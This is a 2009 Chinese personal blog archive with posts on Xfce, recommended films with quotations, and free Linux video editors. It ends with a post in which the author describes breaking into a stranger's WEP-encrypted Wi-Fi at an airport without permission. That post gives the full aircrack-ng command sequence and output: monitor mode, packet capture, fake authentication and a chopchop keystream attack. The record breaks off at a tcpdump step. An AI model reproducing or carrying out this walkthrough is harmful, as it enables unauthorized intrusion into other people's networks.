2009年5月7日星期四

xfce4--简约高速

今天装了个xfce4.6,感觉果然不一样,比gnome快,打开firefox一瞬间就好,vbox的cpu战胜率也下降了……

2009年5月4日星期一

推荐一些经典的电影


很久都不看电影了,不怎么喜欢那些所谓的大片。电脑硬盘里也只是放着那么几部不老不新的片子。重重复复的看着···去感受一种被遗忘很久的温馨与平淡。看久了,就想写点东西,与各位分享,喜欢的可以自己下来看看。同时我也希望看过这篇文章的朋友们,给我推荐推荐你们觉得经典的电影。 每一部电影都在讲述着不同的人生故事,讲述着爱情的甜美、亲情的温馨抑或者是友情的真诚。剧情有时让你感到轻松与喜悦,也有时让你体会到生活的平淡与真实。这或许都并不重要了,至少我们还能够在喧嚣的尘世中安静的坐下来,去感受着每个故事中所表达的“爱”,在一个个不同的人生中找回自己内心深处或许早已被遗忘的关于我们每个人自己的人生故事!找回真实的自己!

1.《当幸福来敲门》


《当幸福来敲门》改编自美国著名黑人投资专家克里斯·加纳出版的同名自传。一个典型的美国式励志故事。一名单身父亲,一度面临连自己的温饱也无法解决的困境。在最困难的时期,只能将自己仅有的财产背在背上,一手提着尿布,一手推着婴儿车,与儿子一起前往无家可归者收容所。实在无处容身时,父子俩只能到公园、地铁卫生间这样的地方过夜。 为了养活儿子,穷困潦倒、无家可归的他从最底层的推销员做起,最后成为全美知名的金融投资家。作者有几句话说的很有道理:“在我二十几岁的时候,我经历了人们可以想象到的各种艰难、黑暗、恐惧的时刻,不过我从来没有放弃过。这本自传还有一层深意,那就是即使在最最艰难的时刻,父亲与儿子是不可分离的。”
对我而言,男主人公和儿子在车站厕所里依靠着过夜的那一幕一直给我很深的印象。
精彩对白
Chris Gardner:You have a dream, you got to protect it.
克里斯·加德纳:如果你有梦想,就要守护它。
Chris Gardner:People can't do something by themselves; they wanna tell you you can not do it.
克里斯·加德纳:当人们做不到一些事情的时候,他们就会对你说你也同样不能。
Chris Gardner:You want something. Go get it!
克里斯·加德纳:有了目标就要全力以赴。

Martin Frohm: What would you say if man walked in here with no shirt, and I hired him? What would you say? 马丁:如果我雇佣了一个没有穿着衬衫走进来的人,你会怎么说?
Chris Gardner: He must have had on some really nice pants.
克里斯·加德纳:他一定穿了一条很棒的裤子。

There is an I in "happiness",There is no Y in "happiness",It's an I
幸福的幸里面是一个“幸”,不是一个“辛”。或者理解成,Y=Why=为什么,I=我。幸福里面没有为什么,只有我。
I'm the type of person,if you ask me a question, and I don't konw the answer,I'm gonna to tell you that I don't konw.But I bet you what: I konw how to find the answer, and I'll find the answer,.
我是这样的人,如果你问的问题我不知道答案,我会直接告诉你“我不知道”。但我向你保证:我知道如何寻找答案,而且我一定会找出答案的。
Don't ever let somebody tell you you can't do something, not even me.
别让别人告诉你你成不了才,即使是我也不行。
2.《爱情呼叫转移》


《爱情呼叫转移》可能是我看过次数最多的一部片子了,看过之后总有种说不来的味道。个中酸甜苦辣的滋味似乎感同深受。记得在学校的电影院里看时,身旁的人都是笑着的,而我却是哭着看完的····唉,这部片子真的可以看看,一切尽在不言中。
3.《暗战》ⅠⅡ


《暗战》ⅠⅡ部,并不怎么喜欢看警匪片,尤其是香港的,不是太暴力就是太血腥,可是《暗战》给我一种很特别的感觉,简单平实的故事情节,没有过多的故弄玄虚。却让人回味许久。夹杂着人生的矛盾,纠缠着人性的挣扎,还带点灰色的风趣··里面的音乐也挺不错,当然本人一直认为《暗战二》里面那个骑自行车追逐的场面是最经典的,虽然身边的朋友对插入郑伊健唱得流行风味十足的背景音乐《敢作敢为》评价不高,但我觉得可能导演看中的并不是曲子而是所写的词···“敢作敢为,今天那天高海阔,一笑常在。”
4.《天行者》


《天行者》这个片子给我的感觉,就是从“坏人”到“好人”的转变竟是那么的难,我们所做的又究竟是对还是错?唉,不重要了,不是有句老话么,人在江湖,身不由己。
经典对白
“你就如一杯咖啡,无论加多少糖,加多少奶,它始终都是咖啡。” “如果我倒掉,从头开始呢?”
“我们不是朋友,我们是兄弟。”
5.《意乱情迷》


《意乱情迷》就像影片的片名一样,确实是意乱情迷··影片到最后似乎到底是情爱还是性爱已经不重要了,这对80或者90后的而言只是一个心里和生理的问题。但至少主人公们在面对情时很理智,选择了属于他们的独有情调。
一直觉得这是对80后人的一种讽刺,想要辩驳,可是细想之下身边之人之事又似乎确如所述··乱了··
6.《最遥远的距离》


《最遥远的距离》每当看到片名,我都会想起大家传为泰戈尔所作的那首经典的诗,“世界上最遥远的距离,不是明明无法抵挡这股想念。却还得故意装作丝毫没有把你放在心里,而是,用自己冷漠的心。对爱你的人掘了一道无法跨越的沟渠。”我并没有看过这部片子,因为我怕看过之后离想象中的差的太远··所以只是让它静静地呆在我的硬盘里。一直没有舍得删去,因为只是看看这个片名,都能勾起我许多回忆。
7.《我的变脸女友》


《我的变脸女友》 很安静的看完这部片子,一个女孩的双重性格,一个男孩的耐心陪伴。纠杂着尘世的喧嚣,喜悦,无奈,痛苦···人是不是都这样,明明内心是那么的痛苦,却还带着微笑的面具。去掩盖伤口。独处时,听着另一个自己那苍老的呼吸,是不是也渴望着和心灵深处的自己见面。
太多的疑问了,时间久了,连自己爱的究竟是谁都已经记不清了,只知道自己深爱着一个人···只是当这个人出现在自己的面前时,她却已经不记得我了···过了很久,我也不知道让那一个她死去是不是对的,但是,当看到她脸上那灿烂的微笑时,我相信,这已经足够了。她很幸福。
8.《我和我的女友》


《我和我的女友》其实这部片子并没有看过,因为当看到影片介绍时,就知道是一部很伤感的片子。故事情节不新,但是我相信会很打动人。
看了几个网友的讨论,有几句让我觉得很能够说明这部片子,“淡淡的悲伤,静静地流泪。他说会为她哭,为她笑,为她好好活。希望他会为了她而幸福,这也是秀恩的愿望。”
还想说几句给各位看官,珍惜自己所拥有的。因为有一天,你或许就会永远的失去··
9.《幸福终点站》


《幸福终点站》喜欢男主人公那种绅士又不失幽默的言谈举止,我也能明白主人公一个人在那国际过境休息厅的中央时无助,彷徨的感觉。就仿佛是被这个文明的世界遗忘,抛弃了一样。被那么简单的漫不经心的忽略掉。当看到自己国家已经发生政变时,那种惊慌失措的举动让我都忘了这是电影。
忽然想起很久以前就听过的一句话,“全世界都可以抛弃你,放弃你。但是,你永远不能放弃你自己。”
等待,漫长的等待,一天,一星期,一个月,一年?··到底还要等多久,谁知道?在等什么,谁又知道?等待是最令人恐惧的一件事。因为它充满了未来的不可预知的可怕。
我不知道如果换作是我,会不会选择走出那扇门,但当我看见女主人公那戏剧般的出场时,便相信属于男主人公的幸福来了。当机场里的各种肤色的人对他微笑时,当“敌人”把衣服披在他身上时,我相信,我们的男主人公维克多此时才真正的邂逅了美国。
男主人公自得其乐地在这样一个狭小的空间里发现了一个巨大的丰富的人生世界,发现这里每天经过形形色色的人与他们各自的人生悲喜,发现这里充满了慷慨与野心,荒唐与惊奇,身份与地位,循规蹈矩与意外奇遇。并且还产生了一段浪漫的爱情。最终,维克多在这个机场邂逅了美国的一切,也邂逅了属于他的幸福。
幸福的终点站,一部让人细细品味的片子,看完片子,每个人都会想属于我们各自的幸福在哪儿?呵呵,我们都不知道。不过,像是谁说过这么一句:幸福在脚下,梦想在心里。向着心指引的那个方向,直走过去就到··看来并不远···其实人生真正的幸福不过如此,平凡中充满了感激与满足。
一种等待、一种承诺、一种宽容、一种坚持,我想每个男人都应该多看几遍这部片子。更应该懂得这些。
其实我觉得好多都算的上是经典对白,摘取几句个人认为不错的。
经典对白
对白1 女主人公:“我得走了”
维克多:“我得留下。这就是人生。”
对白2 维克多:“我们都在等待”
女主人公:“你在等待什么?”
维克多:“你,我在等你”
对白3 “你距离美国只有这么点距离,但是你却没有勇气从这走到那。你是懦夫。”--(谁又知道他没有勇气从这走到那的真正原因是什么。)
10.《遗愿清单》


《遗愿清单》 这绝对是一部令人深思的片子,让你感受着另一种生活。同一个问题:如果可能,你会选择知道自己的死亡日期吗?影片里的卡特会选择仅有4%的人会选择的“愿意”,我想过这个问题很久,我想我的选择会和他一样,我会十分愿意接受死神的审判日期。···确实是个很沉重的话题,有多少人在庸庸碌碌中迷失了自我,放弃了曾经坚定的信念?又有多少人在翻开以前的日记会老泪纵横,后悔自己平凡无奈的人生?“笑一直到哭”匆匆生命中,你我真的有笑到哭出来的境地吗?许有,但应该很少,生活中的种种压力早使我们麻痹了神经。
人生,就是由一个遗憾、在一个遗憾累加组合而成的,当你最终即将面对死亡的时候,就会发现这一生中,有太多值得尝试的事情,却被你无情的错过了···我想,两位老人在离开人世之前,都明白了生活的真正含义,用属于他们的方式,来令生命变得圆满。同时也走进了真正的自我。
我想影片正是想通过一个简单的故事来阐述生命的真谛:热爱生命,追求理想,享受生活。毕竟生命有时是如此的短暂和脆弱。

经典对白:
1.(影片开头和结尾的一段叙述,我觉的这就是该片的最好评论了)it's difficult understand the sum of a person's life.some people will tell you it's measured by the ones left behind.some believe it can be measured in faith.some say by love.other folks say life has no meaning at all.me?i believe that you measure yourself by the people who measured themselves by you,what i can tell you for sure is that ,by any measure edward cole lived more in his last days on earth than most people manage to wring out of a lifetime.i know that when he died,his eyes were closed.and his heart was open.人生的功过是非很难衡量,有人说取决于他所留下的事物。有人让信仰来评定。有人说爱能衡量一切。还有人说人生根本就没有意义。我?我相信你可以用那些以你为度量标准的人来衡量自己。而我所肯定的就是,无论你如何度量,爱德华 .寇尔在这世上活的最后日子比大部分人穷取一生的日子还要充实。我知道当他去世时,他的双眼是闭上的。而他的心灵却是敞开的。
2.“what are you doing here ?”你在这做什么?
“oh,you know,fighting for my life,you?”oh,为生命而战斗,你呢?
3.nobody is perfect 人无完人
4.i just wanted to know how i stand,that is all.我只是想知道我还能活多久,就这个。
5.there was a survey once.曾经有一项调查,a thousand people were asked,if they could know in advance would they want to know the exact day of their death.一千名调查者被问到是否愿意事先知道他们的死期,ninety-six percent of them said no.96%的人不想,i always kind of leaned toward the other 4 percent.我一直以为我就是那剩下的4%。i thought it would be liberating knowing how much time you had left to work with.因为如果能知道自己的生命还剩多少将会是一种解脱。it turns out,it's not.但其实···我不是。
6."she hates me,you hate me?"她恨我,你呢? "not yet"目前还没有
7.we live to die another day.我们活着就是为了某天死去。
8.orgy's not even being unfaithful.放纵并不等于是不忠。
9.standing there at the top of the world,you experienced this profound silence.it was like all sound just fell away.当你站在世界之巅,他经历过这种异常的宁静。就像所有的声音都静默了一样。
10.everyone is afraid to die alone.每个人都害怕孤独终老。i am not evevyone~我不是每个人!but everyone is everyone.但是,每个人就是所有人。
11.《阿甘正传》和《肖申克的救赎》





《阿甘正传》和《肖申克的救赎》这两部应该算是经典中的经典了,这两部片子的评价网上到处都是。没看的绝对是遗憾。
经典对白:Momma always said: "Life is like a box of chocolates, Forrest. You never know what you're gonna get."阿甘:“妈妈常常说,生命就如同一盒朱古力,你永远不会知道你将得到什么。”【这是阿甘经常提醒自己、“劝诫”他人的话。正是这句富含哲理的“箴言”激励着善良真诚、乐天知命的阿甘脚踏实地、努力拼搏,并终由一名智障者变成了美国人心目中一个不朽的传奇人物。】

Fear can hold you prisoner. Hope can set you free.
恐惧让你沦为囚犯。希望可以感受自由。

12.这个应该不算是推荐,因为片名我并不记得,大概上初中的时候偶尔看过的,只是隐约的记得大概的内容,美国一个本来幸福美满的家庭,妻子怀孕了,可是男主人公忽然发现自己得了绝症,于是他对善意的对妻子隐瞒了病情,弥补着自己人生中的许多过错与遗憾,并把自己的人生经验拍成了dv留给自己还未出世的儿子··故事很灰色,但是给人的心灵很大的震撼,找了许多年了,依旧没有找到···
13.《西雅图夜未眠 Sleepless in Seattle》


淡淡的忧愁与温柔,无穷无尽的爱意,或喜或悲的情节。虽然虚幻,但却宁愿真实···男主人公的几句话让我痛了很久,“无数件小事若加起来,那表示我们前生注定,我知道,我头一次接触她时便已知道,那感觉,就像回家,却是前所未有的家。”另一句是医生和男主人公的对话,“真爱过的人很难再恋爱,你想你能再如此深爱吗?”“这很难想象”“你打算怎么办?”···“我打算每天清晨起床,整天呼吸。过阵子,我就不必提醒自己,起床呼吸。再过一阵子,我就不会想起过去的甜蜜···”
经典对白:
1.Destiny is something we've invented because we can't stand the fact that everything that happens is accidental. 命运是我们可以改变的东西,因为我们无法忍受这样的事实,即每天碰巧发生同样的事情。
14.《电子情书.You've Got Mail》



网络永远都是一个虚拟的世界,或许你知道对方是谁,也或许你不知道。但那都是一个看不见彼此的空间。只能通过言语去表达内心深处的自己,善良、罪恶、真实、欺骗。可谁又知道,在不知不觉中,你又走进了谁的世界,谁有走进了你的梦。很不愿相信缘分,可它确实存在。在这虚拟中,你会冥冥中感觉一种相信、一种信任,你知道他(她)就是你此生中所寻找的他(她)。或许他(她)不是你的爱人,但他(她)却可能比你的爱人更了解你。堪称知己。城市的茫茫人海中,或许会和他(她)擦肩而过,或许等过同一班地下铁,或许在同一家老店喝咖啡···也或许真会有一天你们会彼此遇见,谁有知道呢!上天注定的缘分,妙不可言。此时此刻,和你同样坐在电脑前等待着你的信息的会是谁?
15.《公主新娘》


不敢说这部片子是经典。是一位可爱的女孩推荐给我的片子,唯美的画面,幸福温馨的镜头···如那位朋友所说:“这或许是每个女孩子都在自己的梦中期盼遇见到的童话故事。”关于公主和海盗的爱情故事,也许并不会感到新鲜,也许并不现实,甚至故事的结局早已知晓。但相信我们都不会拒绝,关于幸福和爱情的美丽童话永远那么纯美。有时间的话不妨看看,放下你我早已疲惫的心灵,脱下伪善的面具。去感受那份久违的温馨和幸福,找回自己早已遗失的那份童真!
16.《Good will hunting 心灵捕手/骄阳似我》


故事的开始或许会令你觉得十分的枯燥。但是我的建议是请尝试着耐着性子看完它。如果你已经看完了一遍,仍然觉得这是一部看不懂的糟糕透了的片子,没有关系。没有必要去重复不断地再看。毕竟我们大多数都不是研究电影的职业人。但是,我相信会有那么一天,可能是一周、一月也可能是一年或者更长。总会有那么一天,在你不经意间,影片中的一个小小的片段、几句简单的对话会映入你的脑际,让你陷入沉思。
有些电影像是那种高度的烈酒,能够在短时间内触动你我僵硬冷漠的心灵,我们也因此能够在很短的时间回归现实。忘却那份触动。有些电影则是属于那种深埋多年的陈酿,喝起来平淡,却是那么的香醇。令人回味其间,久久都不愿醒来。它不仅仅能触及我们的心灵,还能抚平我们内心深处的岁月伤痕。散去心中的阴霾,让我们找回早已迷失遗忘的人性的光辉。《心灵捕手》就应该属于后者。
孤独、信任、友情、爱情···社会的进步让这个世界越来越小。可我们彼此却越来越远,也越来越感到陌生。于是抛弃了信任,抛弃了爱,孤独的在嬉闹中成长着。也许你早已找到了属于自己的心灵伴侣,也许没有。也许你决定放下顾虑,选择信任。也许你依旧在徘徊犹豫···当生活的一切都成为一种习惯,的确很难去接受任何改变。因为那种改变的痛苦必将是撕心裂肺,仿如凤凰涅槃重生一般。所以我没指望过一部电影就能改变一生。可我想至少我们应该去尝试,尝试着放下防备,尝试着敞开自己的内心,去相信、去信任、去爱!你我都不知道这究竟是错还是对,但就像影片中说的那样:跟着你的心走就没事了!(我看过一个网友对这部片子的评论,写的很详尽,分析的也很到位,比我写的应该要好很多。但考虑种种因素,不变转载。这里把地址放到这,感兴趣的朋友
可以去看看。http://msplinks.com.cn/MDFodHRwOi8vd3d3LnRpYW55YS5jbi9wdWJsaWNmb3J1bS9jb250ZW50L25vMTYvMS8xNTYzODMuc2h0bWw=

经典对白
1.宪法赋予我为自己辩护之权,同时宪法还赋予我自由的权利。自由是一个人呼吸的权利,无法让人呼吸的法律太严肃,如果不自由,人就是行尸走肉。
2.信任就是生命!
3. 如果你和我谈及艺术,你会滔滔不绝的讲每一本写艺术的书。就说米开朗基罗,你一定知道很多关于他的事情,他的生平,与教皇的关系,他的政治报复和性活动。对吗?可你绝对不能告诉我在西斯延教堂里会闻到什么气息,你从来没有站在那美丽的天花板下抬头仰视。
 如果我和你谈及女人,你会给我列举了你喜欢的女人的样子,也许你还和她们睡过几次觉,但你却不能告诉我满怀欣喜的叫醒你身边的女人时的心情。
 你很强壮,如果我和你提起到战争,你也许会和我说莎士比亚:"亲爱的朋友,和我一起再赴战场。"可你从来没有参加过一场战争,当你的朋友将头枕在你的大腿上,那求助的眼神最后的呼吸,你却从未感觉。
 我和你讨论爱情,你会给我背上一首诗,但你从来没有看到过一个真正需要帮助的女人,仅仅是那样一个眼神,让你理解,爱情的真谛。那时你会感到上帝,只是为了你才将天使降于人间,救你脱离生命中的苦难。
 你也不会知道做一个女人的守护天使,那是怎样的一种感觉,你不知道,让爱永远停留在她身边,那种爱会穿越一切阻碍,癌症也无法使之分离。你也不知道整整两个月在医院床前守候的滋味,仅仅握着她的手,医生不会将你赶开,因为她知道探视时间一词对你毫无意义。
 你更不会知道,失去的意义,因为只有当你失去了比你自己还重要的感情时,你才会心有所动。
 我想你恐怕不敢这样去爱别人,当我看着你的时候,我看到的并不是一个机智的男人,自信的男人,而是一个讨厌的毛孩子,不懂事理的毛孩子,一个没用的男人。
 你的确是个天才,这一点没人否认,也许没有一个人真正理解你,对吧?
 可你仅仅凭我画的一幅画,就对我的人生指手划脚。你是一个孤儿对吧?你以为我怎么知道的?你过去的生平,你的性格,你的感情,你认为我读过雾都孤儿吗?那个人是你的缩影,开始我对此没有兴趣,因为我不愿意读那种书,我从你那里学不到任何东西。可后来,兰博尔说了你的事。我开始有兴趣了,治与不治你决定吧。
4.这些小特质让她成为我太太,她也知道我所有的瑕疵。人们称之为“不完美”,其实不然,那才是好东西。能选择让谁进入我们的世界。你并不完美,我不掉你胃口。你认识的女生也不完美,问题是你们是否完美的合适。
5.你可以知道全世界的事,但发掘的方法就是去尝试。
6.我常希望我没有遇见你,这样我夜里就能睡得着,不用惦记有个像你这样的人。
7.一切都结束了,你现在自由了。
8.你跟着心走就没事了···

2009年5月1日星期五

Linux十大免费视频编辑软件大放送

1、AvideMUX

  AvideMUX可以说是使用范围最广的基于Ubuntu Linux的视频编辑程序。它能够帮助用户轻易地完成剪辑、过滤和编码等任务。值得一提的是,AvideMUX通过各种编解码器实现了对主流视频格式的支持,包括AVI、MP4、ASF和兼容于DVD的MPEG文件格式等等。

AvideMUX是Linux中使用范围最广的视频编辑程序

  在项目、队列任务与强大的脚本功能的支持下,AvideMUX的上述特性完全实现了自动化操作。

  Avidemux遵循GNU GPL许可,适用于Linux、BSD、Mac OS X和Windows等平台。

  摘要:在Linux阵营里,后起之秀Ubuntu Linux当属其中的佼佼者。在Ubuntu Linux中缺省安装的应用程序主要包括了桌面环境GNOME、绘图程序GIMP、即时通讯工具Pidgin、办公套件OpenOffice.org、媒体播放器Totem、音乐播放器Rhythmbox以及网页浏览器Firefox等。要执行视频编辑、BT下载和3D图形设计等任务往往需要借助于第三方软件。

  标签:Linux 软件 免费

  2、CinePaint

  CinePaint的特点是简单易用,支持8位、16位和32位颜色通道,能通过HDR(High Dynamic Range,高动态范围)更精确地呈现图象的亮度。

  CinePaint功能强大,简单易用

  CinePaint经常被运用于润饰影片和专业摄影等领域。在为影片进行逐帧润饰、移除、背景修饰以及添加3D文字等方面具有强大的功能。

  CinePaint面向Linux、Mac和BSD平台,目前并不支持Windows操作系统。

  3、Cinelerra

  一言以蔽之,Cinelerra具备三大功能:音视频捕获、合成和编辑!

  摘要:在Linux阵营里,后起之秀Ubuntu Linux当属其中的佼佼者。在Ubuntu Linux中缺省安装的应用程序主要包括了桌面环境GNOME、绘图程序GIMP、即时通讯工具Pidgin、办公套件OpenOffice.org、媒体播放器Totem、音乐播放器Rhythmbox以及网页浏览器Firefox等。要执行视频编辑、BT下载和3D图形设计等任务往往需要借助于第三方软件。

  标签:Linux 软件 免费

  4、Kino

  Kino与IEEE 1394配合使用,能够实现视频捕获、VTR控制以及写入摄像机等功能。Kino不仅提供了音视频滤波器,而且还允许用户进行音视频转换。在各种插件的帮助下,Kino能够将剪辑导出为多种格式的文件,比如通过IEEE 1394写入DV、Raw DV、DV AVI、静止帧、WAV、MP3、MPEG-1、MPEG-2和MPEG-4等。

Kino与IEEE 1394配合使用能够实现多功能

  5、Jahshaka

  Jahshaka的主要功能包括:

  以更高的适应性和更快的速度进行视频编辑;

  实时创建各种效果;

  在播放中的视频中进行各种设计;

  支持任何分辨率下的任何格式。

  摘要:在Linux阵营里,后起之秀Ubuntu Linux当属其中的佼佼者。在Ubuntu Linux中缺省安装的应用程序主要包括了桌面环境GNOME、绘图程序GIMP、即时通讯工具Pidgin、办公套件OpenOffice.org、媒体播放器Totem、音乐播放器Rhythmbox以及网页浏览器Firefox等。要执行视频编辑、BT下载和3D图形设计等任务往往需要借助于第三方软件。

  标签:Linux 软件 免费

  6、Slideshow Creator

  Slideshow Creator能够将各种图片制作成DVD质量的幻灯演示,并允许用户添加丰富多彩的效果。其主要功能包括:

  幻灯片播放时间和音频时间设置;

  音乐重放;

  子窗口放大预览;

  直接创建幻灯片放映和预览。

7、LiVES

  LiVES在一个程序中集合了实时视频和非线性编辑功能。使用LiVES进行视频编辑,用户完全无须担心格式、帧大小和帧率等问题。

  8、Vivia

  Vivia同时适用于Linux和Windows平台,界面友好,操作方便。用户可以在Vivia的时间轴上“大作文章”,比如拖放排列视频次序等。

  Vivia在一个电影项目中支持多场景模式,用户可以借助Vivia轻松高效地编辑剪辑和过渡。

  摘要:在Linux阵营里,后起之秀Ubuntu Linux当属其中的佼佼者。在Ubuntu Linux中缺省安装的应用程序主要包括了桌面环境GNOME、绘图程序GIMP、即时通讯工具Pidgin、办公套件OpenOffice.org、媒体播放器Totem、音乐播放器Rhythmbox以及网页浏览器Firefox等。要执行视频编辑、BT下载和3D图形设计等任务往往需要借助于第三方软件。

  标签:Linux 软件 免费

  9、KDEnlive

  KDEnlive是一个免费的开源视频编辑器,适用于Linux,同时也适用于Linux下的各种桌面管理程序。它支持多种文件格式以及各种各样的摄像机和照相机。

  和LiVES一样,KDEnlive允许用户对无限量的音视频轨道进行多轨编辑。

DEnlive支持多轨编辑

  10、FFmpeg

  FFmped是一个由各种开源库组成的命令行工具,也是另一个适用于Linux的开源视频编辑器。

使用Ubuntu进行无线破解过程


前几天在接女朋友,在机场接女朋友,因为有二个小时,自己坐在机场蛮无聊的,就想拿电脑上网,但发现,基本都是加密的,没有可以用的.所以没法子,只有强行来硬的啦.整个过程一共花了20分钟

我的环境是Ubuntu9.04.用的笔记本是IBM X200 无线网卡是Intel(R) WiFi Link 5100 AGN.在linux下面做这些真是太方便了.以下为整个无线破解的过程.

开启wlan为监听模式
fukai@fukai-laptop:~$ sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
3316 NetworkManager
3335 wpa_supplicant
3340 avahi-daemon
3341 avahi-daemon

Interface Chipset Driver

mon0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0

开始抓包
(这个终端不要关掉)

fukai@fukai-laptop:~$sudo airodump-ng -w chop.cap --ivs --channel 11 mon0

CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

00:02:2D:B4:31:01 -55 0 10 0 0 1 11 OPN C
00:02:2D:B4:5D:8D -51 100 10723 199 0 11 11 OPN C
00:02:2D:B4:30:F6 -72 96 10393 206 0 11 11 OPN C
00:0F:B5:79:04:98 -76 93 8306 24444 0 11 54 . WEP WEP OPN U
00:02:2D:B4:30:F2 -82 2 1463 46 0 6 11 OPN C
00:02:2D:B4:5D:78 -74 0 5 0 0 1 11 OPN C
00:02:2D:B4:31:5A -76 0 6 0 0 1 11 OPN C
00:0D:97:04:90:49 -76 0 0 1 0 1 54 . WPA2 CCMP PSK S
00:02:2D:B4:5D:64 -80 0 8 0 0 1 11 OPN C

BSSID STATION PWR Rate Lost Packets Probes
00:0F:B5:79:04:98 00:21:5D:90:E9:0A 0 1 - 0 0 129203
00:02:2D:B4:30:F2 00:16:EA:E1:57:44 -87 2 - 1 0 22
(not associated) 00:1C:B3:1C:BA:D0 -72 0 - 1 0 17
^C

进行FakeAuth攻击(我原来的x60到这步就死机)
fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:04:98 -h 00:21:5d:90:e9:0a mon0

注:-h为主机MAC地址 -a为需要破解的无线AP的地址

21:59:31 Waiting for beacon frame (BSSID: 00:0F:B5:79:04:98) on channel 11
21:59:31 Sending Authentication Request (Open System) [ACK]
21:59:31 Authentication successful
21:59:31 Sending Association Request [ACK]
21:59:31 Association successful :-) (AID: 1)


进行Chopchop攻击
fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b 00:0F:B5:79:04:98 -h 00:21:5d:90:e9:0a mon0
22:00:05 Waiting for beacon frame (BSSID: 00:0F:B5:79:04:98) on channel 11
Read 2507 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:0F:B5:79:04:98
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:79:04:98

0x0000: 0842 0000 ffff ffff ffff 000f b579 0498 .B...........y..
0x0010: 000f b579 0498 005a 6772 0400 6e0c 067f ...y...Zgr..n..
0x0020: 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab |.....1.&...^P..
0x0030: 3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83 :..V....ob}..N..
0x0040: fca4 5e17 703f f414 828d bd8c 8d21 a2bc ..^.p?.......!..
0x0050: 8767 f385 61cc .g..a.

Use this packet ? y

Saving chosen packet in replay_src-0413-220115.cap

Offset 85 ( 0% done) | xor = F9 | pt = 35 | 92 frames written in 1569ms
Offset 84 ( 1% done) | xor = 82 | pt = E3 | 33 frames written in 561ms
Offset 83 ( 3% done) | xor = 63 | pt = E6 | 141 frames written in 2404ms
Offset 82 ( 5% done) | xor = 77 | pt = 84 | 198 frames written in 3373ms
Offset 81 ( 7% done) | xor = 67 | pt = 00 | 69 frames written in 1166ms
Offset 80 ( 9% done) | xor = 87 | pt = 00 | 3 frames written in 50ms
Offset 79 (11% done) | xor = BC | pt = 00 | 461 frames written in 7840ms
Offset 78 (13% done) | xor = A2 | pt = 00 | 452 frames written in 7665ms
Offset 77 (15% done) | xor = 21 | pt = 00 | 156 frames written in 2660ms
Offset 76 (17% done) | xor = 8D | pt = 00 | 256 frames written in 4360ms
Offset 75 (19% done) | xor = 8C | pt = 00 | 31 frames written in 519ms
Offset 74 (21% done) | xor = BD | pt = 00 | 12 frames written in 211ms
Offset 73 (23% done) | xor = 8D | pt = 00 | 681 frames written in 11572ms
Offset 72 (25% done) | xor = 82 | pt = 00 | 231 frames written in 3936ms
Offset 71 (26% done) | xor = 14 | pt = 00 | 126 frames written in 2148ms
Offset 70 (28% done) | xor = F4 | pt = 00 | 359 frames written in 6085ms
Offset 69 (30% done) | xor = 3F | pt = 00 | 143 frames written in 2443ms
Offset 68 (32% done) | xor = 70 | pt = 00 | 253 frames written in 4307ms
Offset 67 (34% done) | xor = 17 | pt = 00 | 70 frames written in 1182ms
Offset 66 (36% done) | xor = 5E | pt = 00 | 100 frames written in 1691ms
Offset 65 (38% done) | xor = A4 | pt = 00 | 164 frames written in 2779ms
Offset 64 (40% done) | xor = FC | pt = 00 | 1101 frames written in 18689ms
Offset 63 (42% done) | xor = E6 | pt = 65 | 1054 frames written in 17906ms
Offset 62 (44% done) | xor = 9D | pt = 00 | 226 frames written in 3819ms
Offset 61 (46% done) | xor = E6 | pt = A8 | 181 frames written in 3076ms
Offset 60 (48% done) | xor = 09 | pt = C0 | 16 frames written in 271ms
Offset 59 (50% done) | xor = 0B | pt = 00 | 55 frames written in 939ms
Offset 58 (51% done) | xor = 7D | pt = 00 | 71 frames written in 1197ms
Offset 57 (53% done) | xor = 62 | pt = 00 | 228 frames written in 3860ms
Offset 56 (55% done) | xor = 6F | pt = 00 | 331 frames written in 5626ms
Offset 55 (57% done) | xor = F0 | pt = 00 | 198 frames written in 3354ms
Offset 54 (59% done) | xor = 14 | pt = 00 | 64 frames written in 1089ms
Offset 53 (61% done) | xor = A3 | pt = 01 | 246 frames written in 4174ms
Offset 52 (63% done) | xor = FC | pt = 00 | 754 frames written in 12819ms
Offset 51 (65% done) | xor = FE | pt = A8 | 102 frames written in 1721ms
Offset 50 (67% done) | xor = DB | pt = C0 | 42 frames written in 721ms
Offset 49 (69% done) | xor = 87 | pt = 98 | 97 frames written in 1645ms
Offset 48 (71% done) | xor = 3E | pt = 04 | 47 frames written in 797ms
Offset 47 (73% done) | xor = D2 | pt = 79 | 63 frames written in 1064ms
Offset 46 (75% done) | xor = 51 | pt = B5 | 252 frames written in 4252ms
Offset 45 (76% done) | xor = 5F | pt = 0F | 108 frames written in 1828ms
Offset 44 (78% done) | xor = 5E | pt = 00 | 241 frames written in 4074ms
Offset 43 (80% done) | xor = F2 | pt = 01 | 193 frames written in 3257ms
Offset 42 (82% done) | xor = 03 | pt = 00 | 1126 frames written in 19048ms
Offset 41 (84% done) | xor = 18 | pt = 04 | 420 frames written in 7191ms
Offset 40 (86% done) | xor = 20 | pt = 06 | 586 frames written in 9941ms
Offset 39 (88% done) | xor = F1 | pt = 00 | 394 frames written in 6683ms
Offset 38 (90% done) | xor = 39 | pt = 08 | 228 frames written in 3868ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 1015 frames written in 17194ms
Offset 36 (94% done) | xor = FF | pt = 00 | 282 frames written in 4801ms
Offset 35 (96% done) | xor = F8 | pt = 06 | 1830 frames written in 31105ms
Sent 2386 packets, current guess: 48...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor

Completed in 303s (0.16 bytes/s)

使用tcpdump查看生成的CAP文件内容
fukai@fukai-laptop:~$ tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap
